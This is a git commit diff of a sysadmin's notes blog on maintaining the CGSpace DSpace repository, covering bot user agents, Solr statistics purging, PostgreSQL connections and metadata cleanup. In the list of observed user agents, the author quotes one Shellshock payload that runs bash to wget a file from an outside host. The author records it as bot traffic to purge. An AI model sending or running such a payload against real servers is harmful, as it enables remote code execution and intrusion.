Add notes for 2022-03-04

2022-03-04 15:30:06 +03:00
parent 7453499827
commit 27acbac859
115 changed files with 6550 additions and 6444 deletions


@ -18,4 +18,56 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv >
<!--more-->
## 2022-03-04
- Looking over the CGSpace Solr statistics from 2022-02
- I see a few new bots, though once I expanded my search for user agents with "www" in the name I found so many more! (see the Solr query sketch after the list below)
- Here are some of the more prevalent or weird ones:
  - axios/0.21.1
  - Mozilla/5.0 (compatible; Faveeo/1.0; +http://www.faveeo.com)
  - Nutraspace/Nutch-1.2 (www.nutraspace.com)
  - Mozilla/5.0 Moreover/5.1 (+http://www.moreover.com; webmaster@moreover.com)
  - Mozilla/5.0 (compatible; Exploratodo/1.0; +http://www.exploratodo.com)
  - Mozilla/5.0 (compatible; GroupHigh/1.0; +http://www.grouphigh.com/)
  - Crowsnest/0.5 (+http://www.crowsnest.tv/)
  - Mozilla/5.0/Firefox/42.0 - nbertaupete95(at)gmail.com
  - metha/0.2.27
  - ZaloPC-win32-24v454
  - Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:x.x.x) Gecko/20041107 Firefox/x.x
  - ZoteroTranslationServer/WMF (mailto:noc@wikimedia.org)
  - FullStoryBot/1.0 (+https://www.fullstory.com)
  - Link Validity Check From: http://www.usgs.gov
  - OSPScraper (+https://www.opensyllabusproject.org)
  - () { :;}; /bin/bash -c \"wget -O /tmp/bbb www.redel.net.br/1.php?id=3137382e37392e3138372e313832\"
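- To survey user agents containing "www" I queried the Solr statistics core directly (a sketch; the Solr host and port are assumptions based on a standard DSpace setup):
```console
$ curl -s 'http://localhost:8081/solr/statistics/select?q=userAgent:/.*www.*/&rows=0&facet=true&facet.field=userAgent&facet.mincount=1&wt=json'
```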
- I submitted [a pull request to COUNTER-Robots](https://github.com/atmire/COUNTER-Robots/pull/52) with some of these
- I purged a bunch of hits from the stats using the `check-spider-hits.sh` script:
```console
$ ./ilri/check-spider-hits.sh -f dspace/config/spiders/agents/ilri -p
Purging 6 hits from scalaj-http in statistics
Purging 5 hits from lua-resty-http in statistics
Purging 9 hits from AHC in statistics
Purging 7 hits from acebookexternalhit in statistics
Purging 1011 hits from axios\/[0-9] in statistics
Purging 2216 hits from Faveeo\/[0-9] in statistics
Purging 1164 hits from Moreover\/[0-9] in statistics
Purging 740 hits from Exploratodo\/[0-9] in statistics
Purging 585 hits from GroupHigh\/[0-9] in statistics
Purging 438 hits from Crowsnest\/[0-9] in statistics
Purging 1326 hits from nbertaupete95 in statistics
Purging 182 hits from metha\/[0-9] in statistics
Purging 68 hits from ZaloPC-win32-24v454 in statistics
Purging 1644 hits from Firefox\/x\.x in statistics
Purging 678 hits from ZoteroTranslationServer in statistics
Purging 27 hits from FullStoryBot in statistics
Purging 26 hits from Link Validity Check in statistics
Purging 26 hits from OSPScraper in statistics
Purging 1 hits from 3137382e37392e3138372e313832 in statistics
Purging 2755 hits from Nutch-[0-9] in statistics
Total number of bot hits purged: 12914
```
- I added a few from that list to the local overrides in our DSpace while I wait for feedback from the COUNTER-Robots project
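- The overrides go in the same `dspace/config/spiders/agents/ilri` file that `check-spider-hits.sh` reads above, one regex pattern per line, for example (a sketch, not necessarily the exact entries I added):
```console
$ cat >> dspace/config/spiders/agents/ilri <<'EOF'
Faveeo\/[0-9]
Exploratodo\/[0-9]
Crowsnest\/[0-9]
EOF
```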
<!-- vim: set sw=2 ts=2: -->


@ -34,7 +34,7 @@ Last week I had increased the limit from 30 to 60, which seemed to help, but now
$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -126,7 +126,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<li>Looks like DSpace exhausted its PostgreSQL connection pool</li>
<li>Last week I had increased the limit from 30 to 60, which seemed to help, but now there are many more idle connections:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
78
</code></pre><ul>
<li>For now I have increased the limit from 60 to 90, run updates, and rebooted the server</li>
@ -137,7 +137,7 @@ $ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspac
<li>Getting emails from uptimeRobot and uptimeButler that it&rsquo;s down, and Google Webmaster Tools is sending emails that there is an increase in crawl errors</li>
<li>Looks like there are still a bunch of idle PostgreSQL connections:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
96
</code></pre><ul>
<li>For some reason the number of idle connections is very high since we upgraded to DSpace 5</li>
@ -167,12 +167,12 @@ location ~ /(themes|static|aspects/ReportingSuite) {
<li>Need to check <code>/about</code> on CGSpace, as it&rsquo;s blank on my local test server and we might need to add something there</li>
<li>CGSpace has been up and down all day due to PostgreSQL idle connections (current DSpace pool is 90):</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep idle | grep -c cgspace
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep idle | grep -c cgspace
93
</code></pre><ul>
<li>I looked closer at the idle connections and saw that many have been idle for hours (current time on server is <code>2015-11-25T20:20:42+0000</code>):</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | less -S
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | less -S
datid | datname | pid | usesysid | usename | application_name | client_addr | client_hostname | client_port | backend_start | xact_start |
-------+----------+-------+----------+----------+------------------+-------------+-----------------+-------------+-------------------------------+-------------------------------+---
20951 | cgspace | 10966 | 18205 | cgspace | | 127.0.0.1 | | 37731 | 2015-11-25 13:13:02.837624+00 | | 20
@ -197,7 +197,7 @@ datid | datname | pid | usesysid | usename | application_name | client_addr
<li>Monitoring e-mailed in the evening to say CGSpace was down</li>
<li>Idle connections in PostgreSQL again:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
66
</code></pre><ul>
<li>At the time, the current DSpace pool size was 50&hellip;</li>
@ -215,7 +215,7 @@ db.statementpool = true
</code></pre><ul>
<li>And idle connections:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
49
</code></pre><ul>
<li>Perhaps I need to start drastically increasing the connection limits—like to 300—to see if DSpace&rsquo;s thirst can ever be quenched</li>
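<li>In DSpace 5 that would be a <code>dspace.cfg</code> change along these lines (a hypothetical sketch, not values we actually deployed):</li>
</ul>
<pre tabindex="0"><code># hypothetical pool settings, for illustration only
db.maxconnections = 300
db.maxidle = 16
db.maxwait = 5000
</code></pre>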


@ -36,7 +36,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
-rw-rw-r-- 1 tomcat7 tomcat7 387K Nov 18 23:59 dspace.log.2015-11-18.lzo
-rw-rw-r-- 1 tomcat7 tomcat7 169K Nov 18 23:59 dspace.log.2015-11-18.xz
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -137,7 +137,7 @@ Replace lzop with xz in log compression cron jobs on DSpace Test—it uses less
<li>CGSpace went down again (due to PostgreSQL idle connections of course)</li>
<li>Current database settings for DSpace are <code>db.maxconnections = 30</code> and <code>db.maxidle = 8</code>, yet idle connections are exceeding this:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
39
</code></pre><ul>
<li>I restarted PostgreSQL and Tomcat and it&rsquo;s back</li>
@ -189,7 +189,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>CGSpace very slow, and monitoring emailing me to say it&rsquo;s down, even though I can load the page (very slowly)</li>
<li>Idle postgres connections look like this (with no change in DSpace db settings lately):</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
29
</code></pre><ul>
<li>I restarted Tomcat and postgres&hellip;</li>
@ -214,7 +214,7 @@ $ curl -o /dev/null -s -w %{time_total}\\n https://cgspace.cgiar.org/rest/handle
<li>CGSpace has been up and down all day and REST API is completely unresponsive</li>
<li>PostgreSQL idle connections are currently:</li>
</ul>
<pre tabindex="0"><code>postgres@linode01:~$ psql -c 'SELECT * from pg_stat_activity;' | grep cgspace | grep -c idle
<pre tabindex="0"><code>postgres@linode01:~$ psql -c &#39;SELECT * from pg_stat_activity;&#39; | grep cgspace | grep -c idle
28
</code></pre><ul>
<li>I have reverted all the pgtune tweaks from the other day, as they didn&rsquo;t fix the stability issues, so I&rsquo;d rather not have them introducing more variables into the equation</li>


@ -28,7 +28,7 @@ Move ILRI collection 10568/12503 from 10568/27869 to 10568/27629 using the move_
I realized it is only necessary to clear the Cocoon cache after moving collections—rather than reindexing—as no metadata has changed, and therefore no search or browse indexes need to be updated.
Update GitHub wiki for documentation of maintenance tasks.
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -135,7 +135,7 @@ Update GitHub wiki for documentation of maintenance tasks.
<li>Tweak date-based facets to show more values in drill-down ranges (<a href="https://github.com/ilri/DSpace/issues/162">#162</a>)</li>
<li>Need to remember to clear the Cocoon cache after deployment or else you don&rsquo;t see the new ranges immediately</li>
<li>Set up recipe on IFTTT to tweet new items from the CGSpace Atom feed to my twitter account</li>
<li>Altmetrics' support for Handles is kinda weak, so they can&rsquo;t associate our items with DOIs until they are tweeted or blogged, etc first.</li>
<li>Altmetrics&rsquo; support for Handles is kinda weak, so they can&rsquo;t associate our items with DOIs until they are tweeted or blogged, etc first.</li>
</ul>
<h2 id="2016-01-21">2016-01-21</h2>
<ul>


@ -38,7 +38,7 @@ I noticed we have a very interesting list of countries on CGSpace:
Not only are there 49,000 countries, we have some blanks (25)&hellip;
Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&rdquo;
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -145,15 +145,15 @@ Also, lots of things like &ldquo;COTE D`LVOIRE&rdquo; and &ldquo;COTE D IVOIRE&r
<li>In this case our country field is 78</li>
<li>Now find all resources with type 2 (item) that have null/empty values for that field:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value='' OR text_value IS NULL);
<pre tabindex="0"><code>dspacetest=# select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id=78 and (text_value=&#39;&#39; OR text_value IS NULL);
</code></pre><ul>
<li>Then you can find the handle that owns it from its <code>resource_id</code>:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = '22678';
<pre tabindex="0"><code>dspacetest=# select handle from item, handle where handle.resource_id = item.item_id AND item.item_id = &#39;22678&#39;;
</code></pre><ul>
<li>It&rsquo;s 25 items so editing in the web UI is annoying, let&rsquo;s try SQL!</li>
</ul>
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value='';
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where metadata_field_id=78 and text_value=&#39;&#39;;
DELETE 25
</code></pre><ul>
<li>After that perhaps a regular <code>dspace index-discovery</code> (no -b) <em>should</em> suffice&hellip;</li>
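<li>That is, omitting the <code>-b</code> flag that wipes and rebuilds the whole index:</li>
</ul>
<pre tabindex="0"><code>$ ~/dspace/bin/dspace index-discovery
</code></pre>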
@ -198,7 +198,7 @@ $ /opt/brew/Cellar/tomcat/8.0.30/bin/catalina start
<li>Add CATALINA_OPTS in <code>/opt/brew/Cellar/tomcat/8.0.30/libexec/bin/setenv.sh</code>, as this script is sourced by the <code>catalina</code> startup script</li>
<li>For example:</li>
</ul>
<pre tabindex="0"><code>CATALINA_OPTS=&quot;-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8&quot;
<pre tabindex="0"><code>CATALINA_OPTS=&#34;-Djava.awt.headless=true -Xms2048m -Xmx2048m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8&#34;
</code></pre><ul>
<li>After verifying that the site is working, start a full index:</li>
</ul>
@ -253,7 +253,7 @@ Swap: 255 57 198
<li>There are 1200 records that have PDFs, and will need to be imported into CGSpace</li>
<li>I created a <code>filename</code> column based on the <code>dc.identifier.url</code> column using the following transform:</li>
</ul>
<pre tabindex="0"><code>value.split('/')[-1]
<pre tabindex="0"><code>value.split(&#39;/&#39;)[-1]
</code></pre><ul>
<li>Then I wrote a tool called <a href="https://gist.github.com/alanorth/2206f24483fe5f0454fc"><code>generate-thumbnails.py</code></a> to download the PDFs and generate thumbnails for them, for example:</li>
</ul>
@ -278,13 +278,13 @@ Processing 64195.pdf
<li>Looking at CIAT&rsquo;s records again, there are some files linking to PDFs on Slide Share, Embrapa, UEA UK, and Condesan, so I&rsquo;m not sure if we can use those</li>
<li>265 items have dirty, URL-encoded filenames:</li>
</ul>
<pre tabindex="0"><code>$ ls | grep -c -E &quot;%&quot;
<pre tabindex="0"><code>$ ls | grep -c -E &#34;%&#34;
265
</code></pre><ul>
<li>I suggest that we import ~850 or so of the clean ones first, then do the rest after I can find a clean/reliable way to decode the filenames</li>
<li>This python2 snippet seems to work in the CLI, but not so well in OpenRefine:</li>
</ul>
<pre tabindex="0"><code>$ python -c &quot;import urllib, sys; print urllib.unquote(sys.argv[1])&quot; CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
<pre tabindex="0"><code>$ python -c &#34;import urllib, sys; print urllib.unquote(sys.argv[1])&#34; CIAT_COLOMBIA_000169_T%C3%A9cnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_yuca.pdf
</code></pre><ul>
<li>Merge pull requests for submission form theming (<a href="https://github.com/ilri/DSpace/pull/178">#178</a>) and missing center subjects in XMLUI item views (<a href="https://github.com/ilri/DSpace/pull/176">#176</a>)</li>
@ -294,7 +294,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<ul>
<li>Turns out OpenRefine has an unescape function!</li>
</ul>
<pre tabindex="0"><code>value.unescape(&quot;url&quot;)
<pre tabindex="0"><code>value.unescape(&#34;url&#34;)
</code></pre><ul>
<li>This turns the URLs into human-readable versions that we can use as proper filenames</li>
<li>Run web server and system updates on DSpace Test and reboot</li>
@ -302,7 +302,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<li>Then you create a facet for blank values on each column, show the rows that have values for one and not the other, then transform each independently to have the contents of the other, with &ldquo;||&rdquo; in between (see the GREL sketch after this list)</li>
<li>Work on Python script for parsing and downloading PDF records from <code>dc.identifier.url</code></li>
<li>To get filenames from <code>dc.identifier.url</code>, create a new column based on this transform: <code>forEach(value.split('||'), v, v.split('/')[-1]).join('||')</code></li>
<li>This also works for records that have multiple URLs (separated by &ldquo;||&quot;)</li>
<li>This also works for records that have multiple URLs (separated by &ldquo;||&rdquo;)</li>
</ul>
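<ul>
<li>A hypothetical GREL sketch of that merge, where <code>other</code> stands in for the second column&rsquo;s name:</li>
</ul>
<pre tabindex="0"><code>if(isBlank(cells['other'].value), value, value + '||' + cells['other'].value)
</code></pre>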
<h2 id="2016-02-17">2016-02-17</h2>
<ul>
@ -325,7 +325,7 @@ CIAT_COLOMBIA_000169_Técnicas_para_el_aislamiento_y_cultivo_de_protoplastos_de_
<ul>
<li>To change Spanish accents to ASCII in OpenRefine:</li>
</ul>
<pre tabindex="0"><code>value.replace('ó','o').replace('í','i').replace('á','a').replace('é','e').replace('ñ','n')
<pre tabindex="0"><code>value.replace(&#39;ó&#39;,&#39;o&#39;).replace(&#39;í&#39;,&#39;i&#39;).replace(&#39;á&#39;,&#39;a&#39;).replace(&#39;é&#39;,&#39;e&#39;).replace(&#39;ñ&#39;,&#39;n&#39;)
</code></pre><ul>
<li>But actually, the accents might not be an issue, as I can successfully import files containing Spanish accents on my Mac</li>
<li>On closer inspection, I can import files with the following names on Linux (DSpace Test):</li>
@ -353,7 +353,7 @@ Bitstream: tést señora alimentación.pdf
<li>Looking at the filenames for the CIAT Reports, some have some really ugly characters, like: <code>'</code> or <code>,</code> or <code>=</code> or <code>[</code> or <code>]</code> or <code>(</code> or <code>)</code> or <code>_.pdf</code> or <code>._</code> etc</li>
<li>It&rsquo;s tricky to parse those things in some programming languages so I&rsquo;d rather just get rid of the weird stuff now in OpenRefine:</li>
</ul>
<pre tabindex="0"><code>value.replace(&quot;'&quot;,'').replace('_=_','_').replace(',','').replace('[','').replace(']','').replace('(','').replace(')','').replace('_.pdf','.pdf').replace('._','_')
<pre tabindex="0"><code>value.replace(&#34;&#39;&#34;,&#39;&#39;).replace(&#39;_=_&#39;,&#39;_&#39;).replace(&#39;,&#39;,&#39;&#39;).replace(&#39;[&#39;,&#39;&#39;).replace(&#39;]&#39;,&#39;&#39;).replace(&#39;(&#39;,&#39;&#39;).replace(&#39;)&#39;,&#39;&#39;).replace(&#39;_.pdf&#39;,&#39;.pdf&#39;).replace(&#39;._&#39;,&#39;_&#39;)
</code></pre><ul>
<li>Finally import the 1127 CIAT items into CGSpace: <a href="https://cgspace.cgiar.org/handle/10568/35710">https://cgspace.cgiar.org/handle/10568/35710</a></li>
<li>Re-deploy CGSpace with the Google Scholar fix, but I&rsquo;m waiting on the Atmire fixes for now, as the branch history is ugly</li>


@ -28,7 +28,7 @@ Looking at issues with author authorities on CGSpace
For some reason we still have the index-lucene-update cron job active on CGSpace, but I&rsquo;m pretty sure we don&rsquo;t need it as of the latest few versions of Atmire&rsquo;s Listings and Reports module
Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Java JDK 1.7 to match environment on CGSpace server
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -128,7 +128,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<li>I identified one commit that causes the issue and let them know</li>
<li>Restart DSpace Test, as it seems to have crashed after Sisay tried to import some CSV or zip or something:</li>
</ul>
<pre tabindex="0"><code>Exception in thread &quot;Lucene Merge Thread #19&quot; org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
<pre tabindex="0"><code>Exception in thread &#34;Lucene Merge Thread #19&#34; org.apache.lucene.index.MergePolicy$MergeException: java.io.IOException: No space left on device
</code></pre><h2 id="2016-03-08">2016-03-08</h2>
<ul>
<li>Add a few new filters to Atmire&rsquo;s Listings and Reports module (<a href="https://github.com/ilri/DSpace/issues/180">#180</a>)</li>
@ -261,7 +261,7 @@ Reinstall my local (Mac OS X) DSpace stack with Tomcat 7, PostgreSQL 9.3, and Ja
<ul>
<li>Abenet is having problems saving group memberships, and she gets this error: <a href="https://gist.github.com/alanorth/87281c061c2de57b773e">https://gist.github.com/alanorth/87281c061c2de57b773e</a></li>
</ul>
<pre tabindex="0"><code>Can't find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
<pre tabindex="0"><code>Can&#39;t find method org.dspace.app.xmlui.aspect.administrative.FlowGroupUtils.processSaveGroup(org.dspace.core.Context,number,string,[Ljava.lang.String;,[Ljava.lang.String;,org.apache.cocoon.environment.wrapper.RequestWrapper). (resource://aspects/Administrative/administrative.js#967)
</code></pre><ul>
<li>I can reproduce the same error on DSpace Test and on my Mac</li>
<li>Looks to be an issue with the Atmire modules, I&rsquo;ve submitted a ticket to their tracker.</li>


@ -32,7 +32,7 @@ After running DSpace for over five years I&rsquo;ve never needed to look in any
This will save us a few gigs of backup space we&rsquo;re paying for on S3
Also, I noticed the checker log has some errors we should pay attention to:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -150,7 +150,7 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
******************************************************
</code></pre><ul>
<li>So this would be the <code>tomcat7</code> Unix user, who seems to have a default limit of 1024 files in its shell</li>
<li>For what it&rsquo;s worth, we have been setting the actual Tomcat 7 process' limit to 16384 for a few years (in <code>/etc/default/tomcat7</code>)</li>
<li>For what it&rsquo;s worth, we have been setting the actual Tomcat 7 process&rsquo; limit to 16384 for a few years (in <code>/etc/default/tomcat7</code>)</li>
<li>Looks like cron will read limits from <code>/etc/security/limits.*</code> so we can do something for the tomcat7 user there (sketched after this list)</li>
<li>Submit pull request for Tomcat 7 limits in Ansible dspace role (<a href="https://github.com/ilri/rmg-ansible-public/pull/30">#30</a>)</li>
</ul>
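<ul>
<li>A sketch of what that could look like in <code>/etc/security/limits.d/tomcat7.conf</code> (hypothetical file name; the value matches the 16384 we already set for the Tomcat process):</li>
</ul>
<pre tabindex="0"><code># hypothetical: raise the open file limit for the tomcat7 user's cron jobs
tomcat7 soft nofile 16384
tomcat7 hard nofile 16384
</code></pre>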
@ -159,10 +159,10 @@ java.io.FileNotFoundException: /home/cgspace.cgiar.org/assetstore/64/29/06/64290
<li>Reduce Amazon S3 storage used for logs from 46 GB to 6GB by deleting a bunch of logs we don&rsquo;t need!</li>
</ul>
<pre tabindex="0"><code># s3cmd ls s3://cgspace.cgiar.org/log/ &gt; /tmp/s3-logs.txt
# grep checker.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep cocoon.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep handle-plugin.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep solr.log /tmp/s3-logs.txt | awk '{print $4}' | xargs s3cmd del
# grep checker.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep cocoon.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep handle-plugin.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
# grep solr.log /tmp/s3-logs.txt | awk &#39;{print $4}&#39; | xargs s3cmd del
</code></pre><ul>
<li>Also, adjust the cron jobs for backups so they only backup <code>dspace.log</code> and some stats files (.dat)</li>
<li>Try to do some metadata field migrations using the Atmire batch UI (<code>dc.Species</code> → <code>cg.species</code>) but it took several hours and even missed a few records</li>
@ -199,13 +199,13 @@ UPDATE 51258
<li>Looking at the DOI issue <a href="https://www.yammer.com/dspacedevelopers/#/Threads/show?threadId=678507860">reported by Leroy from CIAT a few weeks ago</a></li>
<li>It seems the <code>dx.doi.org</code> URLs are much more proper in our repository!</li>
</ul>
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://dx.doi.org%';
<pre tabindex="0"><code>dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like &#39;http://dx.doi.org%&#39;;
count
-------
5638
(1 row)
dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like 'http://doi.org%';
dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and text_value like &#39;http://doi.org%&#39;;
count
-------
3
@ -231,11 +231,11 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=74 and t
<li>I decided to keep the set of subjects that had <code>FMD</code> and <code>RANGELANDS</code> added, as it appears they were added by request and that set might be the newer list</li>
<li>I found 226 blank metadatavalues:</li>
</ul>
<pre tabindex="0"><code>dspacetest# select * from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspacetest# select * from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
</code></pre><ul>
<li>I think we should delete them and do a full re-index:</li>
</ul>
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>dspacetest=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 226
</code></pre><ul>
<li>I deleted them on CGSpace but I&rsquo;ll wait to do the re-index as we&rsquo;re going to be doing one in a few days for the metadata changes anyways</li>
@ -294,7 +294,7 @@ UPDATE metadatavalue SET metadata_field_id=215 WHERE metadata_field_id=106
UPDATE 3872
UPDATE metadatavalue SET metadata_field_id=217 WHERE metadata_field_id=108
UPDATE 46075
$ JAVA_OPTS=&quot;-Xms512m -Xmx512m -Dfile.encoding=UTF-8&quot; ~/dspace/bin/dspace index-discovery -bf
$ JAVA_OPTS=&#34;-Xms512m -Xmx512m -Dfile.encoding=UTF-8&#34; ~/dspace/bin/dspace index-discovery -bf
</code></pre><ul>
<li>CGSpace was down but I&rsquo;m not sure why, this was in <code>catalina.out</code>:</li>
</ul>
@ -387,7 +387,7 @@ UPDATE 46075
<li>Basically, this gives us the ability to use the latest upstream stable 9.3.x release (currently 9.3.12)</li>
<li>Looking into the REST API errors again, it looks like these started appearing a few days ago in the tens of thousands:</li>
</ul>
<pre tabindex="0"><code>$ grep -c &quot;Aborting context in finally statement&quot; dspace.log.2016-04-20
<pre tabindex="0"><code>$ grep -c &#34;Aborting context in finally statement&#34; dspace.log.2016-04-20
21252
</code></pre><ul>
<li>I found a recent discussion on the DSpace mailing list and I&rsquo;ve asked for advice there</li>
@ -423,7 +423,7 @@ UPDATE 46075
<li>Looks like the last one was &ldquo;down&rdquo; from about four hours ago</li>
<li>I think there must be something with this REST stuff:</li>
</ul>
<pre tabindex="0"><code># grep -c &quot;Aborting context in finally statement&quot; dspace.log.2016-04-*
<pre tabindex="0"><code># grep -c &#34;Aborting context in finally statement&#34; dspace.log.2016-04-*
dspace.log.2016-04-01:0
dspace.log.2016-04-02:0
dspace.log.2016-04-03:0


@ -34,7 +34,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
# awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -126,7 +126,7 @@ There are 3,000 IPs accessing the REST API in a 24-hour period!
<li>I have blocked access to the API now</li>
<li>There are 3,000 IPs accessing the REST API in a 24-hour period!</li>
</ul>
<pre tabindex="0"><code># awk '{print $1}' /var/log/nginx/rest.log | uniq | wc -l
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | uniq | wc -l
3168
</code></pre><ul>
<li>The two most often requesters are in Ethiopia and Colombia: 213.55.99.121 and 181.118.144.29</li>
@ -166,8 +166,8 @@ LE_RESULT=$?
$SERVICE_BIN nginx start
if [[ &quot;$LE_RESULT&quot; != 0 ]]; then
echo 'Automated renewal failed:'
if [[ &#34;$LE_RESULT&#34; != 0 ]]; then
echo &#39;Automated renewal failed:&#39;
cat /var/log/letsencrypt/renew.log
@ -240,7 +240,7 @@ fi
</li>
<li>Found ~200 messed up CIAT values in <code>dc.publisher</code>:</li>
</ul>
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to &quot;% %&quot;;
<pre tabindex="0"><code># select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=39 and text_value similar to &#34;% %&#34;;
</code></pre><h2 id="2016-05-13">2016-05-13</h2>
<ul>
<li>More theorizing about CGcore</li>
@ -259,7 +259,7 @@ fi
<li>They have thumbnails on Flickr and elsewhere</li>
<li>In OpenRefine I created a new <code>filename</code> column based on the <code>thumbnail</code> column with the following GREL:</li>
</ul>
<pre tabindex="0"><code>if(cells['thumbnails'].value.contains('hqdefault'), cells['thumbnails'].value.split('/')[-2] + '.jpg', cells['thumbnails'].value.split('/')[-1])
<pre tabindex="0"><code>if(cells[&#39;thumbnails&#39;].value.contains(&#39;hqdefault&#39;), cells[&#39;thumbnails&#39;].value.split(&#39;/&#39;)[-2] + &#39;.jpg&#39;, cells[&#39;thumbnails&#39;].value.split(&#39;/&#39;)[-1])
</code></pre><ul>
<li>Because ~400 records had the same filename on Flickr (hqdefault.jpg) but different UUIDs in the URL</li>
<li>So for the <code>hqdefault.jpg</code> ones I just take the UUID (-2) and use it as the filename</li>
@ -269,7 +269,7 @@ fi
<ul>
<li>More quality control on <code>filename</code> field of CCAFS records to make processing in shell and SAFBuilder more reliable:</li>
</ul>
<pre tabindex="0"><code>value.replace('_','').replace('-','')
<pre tabindex="0"><code>value.replace(&#39;_&#39;,&#39;&#39;).replace(&#39;-&#39;,&#39;&#39;)
</code></pre><ul>
<li>We need to hold off on moving <code>dc.Species</code> to <code>cg.species</code> because it is only used for plants, and might be better to move it to something like <code>cg.species.plant</code></li>
